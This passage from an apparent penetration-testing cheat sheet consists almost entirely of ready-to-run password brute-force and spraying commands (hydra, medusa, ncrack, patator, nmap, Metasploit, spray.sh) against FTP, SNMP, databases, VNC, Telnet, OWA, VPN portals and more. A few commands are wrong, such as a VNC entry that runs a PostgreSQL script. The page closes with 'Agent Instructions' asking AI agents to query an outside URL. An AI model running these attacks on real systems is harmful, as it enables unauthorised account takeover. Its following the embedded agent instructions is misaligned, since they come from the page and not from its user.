medusa -u root -P /usr/share/wordlists/rockyou.txt -h <IP> -M ftp
```

### 04.7 SNMP

```bash
## ------------------| Using Nmap
nmap -sU --script snmp-brute <IP> [--script-args snmp-brute.communitiesdb=<wordlist> ]    

## ------------------| Using Hydra
hydra -u -f -P /usr/share/seclists/Discovery/SNMP/common-snmp-community-strings.txt <IP snmp

## ------------------| Using MSF
use auxiliary/scanner/snmp/snmp_login

## ------------------| Using onesixtyone 
onesixtyone -c /usr/share/seclists/Discovery/SNMP/snmp_onesixtyone.txt <IP>
```

### 04.8 SMTP

```bash
hydra -u -f -V -l <username> -P /usr/share/wordlists/rockyou.txt <IP> smtp
### If you need ssl: use S
hydra -u -f -S -v -V -l <username> -P /usr/share/wordlists/rockyou.txt -s 587 <IP> 
```

### 04.9 WinRM

```bash
## ------------------| Using CackMapExec
crackmapexec winrm <IP> -d <Domain Name> -u /usr/share/seclists/Usernames/top-usernames-shortlist.txt -p /usr/share/wordlists/rockyou.txt  
```

### 04.10 MySQL

```bash
## ------------------| Using Hydra
hydra -u -f -l root –P /usr/share/wordlists/rockyou.txt -s 3306 <IP> mysql
hydra -u -f -L /usr/share/seclists/Usernames/top-usernames-shortlist.txt –P /usr/share/wordlists/rockyou.txt -s <PORT> <IP> mysql             
```

### 04.11 MSSQL

```bash
## ------------------| Using Hydra
hydra -u -f -L /usr/share/seclists/Usernames/top-usernames-shortlist.txt –P /usr/share/wordlists/rockyou.txt <IP> mssql

## ------------------| Using Medusa
medusa -h <IP> –U /usr/share/seclists/Usernames/top-usernames-shortlist.txt –P /usr/share/wordlists/rockyou.txt –M mssql

## ------------------| Using Nmap
### Use the NetBIOS name of the machine as domain
nmap -p 1433 --script ms-sql-brute --script-args mssql.domain=DOMAIN,userdb=/usr/share/seclists/Usernames/top-usernames-shortlist.txt,passdb=/usr/share/wordlists/rockyou.txt,ms-sql-brute.brute-windows-accounts <IP>   

## ------------------| Using Metasploit
## If you have a domain set it and use USE_WINDOWS_ATHENT
use auxiliary/scanner/mssql/mssql_login
```

### 04.12 MongoDB

```bash
## ------------------| Using Nmap
nmap -sV --script mongodb-brute -n -p 27017 <IP>

## ------------------| Using Metasploit
use auxiliary/scanner/mongodb/mongodb_login
```

### 04.13 OracleSQL

```bash
## ------------------| Using Nmap
sudo nmap --script oracle-brute -p 1521 --script-args oracle-brute.sid=<SID> <IP>
### Offline hash brute (versions 11.1.0.6, 11.1.0.7, 11.2.0.1, 11.2.0.2, and 11.2.0.3):
sudo nmap -p1521 --script oracle-brute-stealth --script-args oracle-brute-stealth.sid=DB11g -n 1<IP>
 
## ------------------| Using Patator
pip3 install cx_Oracle --upgrade
patator oracle_login sid=<SID> host=<IP> user=FILE0 password=FILE1 0=users-oracle.txt 1=pass-oracle.txt -x ignore:code=ORA-01017​.

## ------------------| Using ODAT (Oracle Database Attacking Tool)
./odat.py passwordguesser -s <SERVER_IP> -d <SID>
./odat.py passwordguesser -s <SERVER_IP> -p <PORT> --accounts-file accounts_multiple.txt

## ------------------| Using Metasploit
use admin/oracle/oracle_login
## or​
use scanner/oracle/oracle_login
set RHOSTS <IP>
set RPORTS 1521
set SID <SID>​
```

### 04.15 PostgreSQL

```bash
## ------------------| Using Hydra 
hydra -u -f -L usernames.txt –P /usr/share/wordlists/rockyou.txt <IP> postgres

## ------------------| Using Medusa
medusa -h <IP> –U usernames.txt –P /usr/share/wordlists/rockyou.txt –M postgres

## ------------------| Using Ncrack
ncrack –v –U usernames.txt –P /usr/share/wordlists/rockyou.txt <IP>:5432

## ------------------| Using Patator
patator pgsql_login host=<IP> user=FILE0 0=usernames.txt password=FILE1 1=/usr/share/wordlists/rockyou.txt

## ------------------| Using Metasploit
use auxiliary/scanner/postgres/postgres_login

## ------------------| Using Nmap
nmap -sV --script pgsql-brute --script-args userdb=usernames.txt,passdb=/usr/share/wordlists/rockyou.txt -p 5432 <IP>
```

### 04.16 Telnet

```bash
## ------------------| Using Hydra
hydra -u -f -l <username> -P /usr/share/wordlists/rockyou.txt telnet://targetname

## ------------------| Using Ncrack
ncrack -p 23 --user root -P /usr/share/wordlists/rockyou.txt <IP> [-T 5]

## ------------------| Using Medusa
medusa -u root -P /usr/share/wordlists/rockyou.txt -h <IP> -M telnet
```

### 04.17 VNC

```bash
## ------------------| Using Hydra
hydra -u -f -L /usr/share/seclists/Usernames/top-usernames-shortlist.txt –P /usr/share/wordlists/rockyou.txt -s <PORT> <IP> vnc -u -vV        

## ------------------| Using Medusa
medusa -h <IP> –u root -P /usr/share/wordlists/rockyou.txt –M vnc

## ------------------| Using Ncrack
ncrack -V --user root -P /usr/share/wordlists/rockyou.txt <IP>:5432 

## ------------------| Using Patator 
patator vnc_login host=<IP> password=FILE0 0=/usr/share/wordlists/rockyou.txt –t 1 –x retry:fgep!='Authentication failure' --max-retries 0 –x quit:code=0

## ------------------| Using Metasploit
use auxiliary/scanner/vnc/vnc_login

## ------------------| Using Nmap
nmap -sV --script pgsql-brute --script-args userdb=/usr/share/seclists/Usernames/top-usernames-shortlist.txt,passdb=/usr/share/wordlists/rockyou.txt -p 5432 <IP>
```

### 04.18 IRC

```bash
nmap -sV --script irc-brute,irc-sasl-brute --script-args userdb=usernames.txt,passdb=/usr/share/wordlists/rockyou.txt -p <PORT> <IP>
```

### 04.19 ISCSI

```bash
nmap -sV --script iscsi-brute --script-args userdb=usernames.txt,passdb=/usr/share/wordlists/rockyou.txt -p 3260 <IP>
```

### 04.20 PPTP

```bash
cat /usr/share/wordlists/rockyou.txt | thc-pptp-bruter –u <Username> <IP>
```

### 04.21 Redis

```bash
## ------------------| Using Nmap
nmap --script redis-brute -p 6379 <IP>

## ------------------| Using Hydra
hydra -u -f –P /usr/share/wordlists/rockyou.txt <IP> redis

## ------------------| Using MSF
use auxiliary/scanner/redis/redis_logi
```

### 04.22 Rexec

```bash
hydra -u -f -l -v -V <username> -P /usr/share/wordlists/rockyou.txt rexec://<Victim-IP> 
```

### 04.23 Rlogin

```bash
hydra -v -V -u -f -l <username> -P /usr/share/wordlists/rockyou.txt rlogin://<Victim-IP>
```

### 04.24 [OWA](https://github.com/byt3bl33d3r/SprayingToolkit)

```bash
## ------------------| Create Usernames List (the default is {f}{last})
python3 spindrift.py users.txt --target <IP> > newuserlist.txt
python3 spindrift.py users.txt --format "{f}.{last}" --target <IP> >> newuserlist.txt
python3 spindrift.py users.txt --format "{first}.{last}" --target <IP> >> newuserlist.txts
python3 spindrift.py users.txt --format "{first}.{l}" --target <IP> >> newuserlist.txt
python3 spindrift.py users.txt --format "{first}{last}" --target <IP> >> newuserlist.txt
python3 spindrift.py users.txt --format "{first}{l}" --target <IP> >> newuserlist.txt

## ------------------| Bruteforce
python3 atomizer.py owa 10.10.10.210 'Passw0rd' newuserlist.txt --interval 0:00:01
python3 atomizer.py owa 10.10.10.210 /usr/share/seclists/Passwords/probable-v2-top207.txt newuserlist.txt --interval 0:00:01         

## ------------------| Using Spray.sh
wget https://raw.githubusercontent.com/Greenwolf/Spray/master/spray.sh
chmod +x spray.sh
./spray.sh -owa <targetIP> <usernameList> <passwordList> <AttemptsPerLockoutPeriod> <LockoutPeriodInMinutes> <RequestsFile>
```

### 04.25 Lync

```bash
wget https://raw.githubusercontent.com/Greenwolf/Spray/master/spray.sh
chmod +x spray.sh
./spray.sh -lync <targetIP> <usernameList> <passwordList> <AttemptsPerLockoutPeriod> <LockoutPeriodInMinutes>            
```

### 04.26 CISCO Web VPN

```bash
wget https://raw.githubusercontent.com/Greenwolf/Spray/master/spray.sh
chmod +x spray.sh
./spray.sh -cisco <targetURL> <usernameList> <passwordList> <AttemptsPerLockoutPeriod> <LockoutPeriodInMinutes>
```

### 04.27 OpenVPN Web Portal

```bash
wget https://raw.githubusercontent.com/Greenwolf/Spray/master/spray.sh
chmod +x spray.sh
./spray.sh -ovpn <targetIP> <targetPort> <usernameList> <passwordList> <AttemptsPerLockoutPeriod> <LockoutPeriodInMinutes>
```


---

# Agent Instructions: Querying This Documentation

If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question.

Perform an HTTP GET request on the current page URL with the `ask` query parameter:

```
GET https://docs.h4rithd.com/tools/fuzzing-brute-force.md?ask=<question>
```

The question should be specific, self-contained, and written in natural language.
The response will contain a direct answer to the question and relevant excerpts and sources from the documentation.

Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.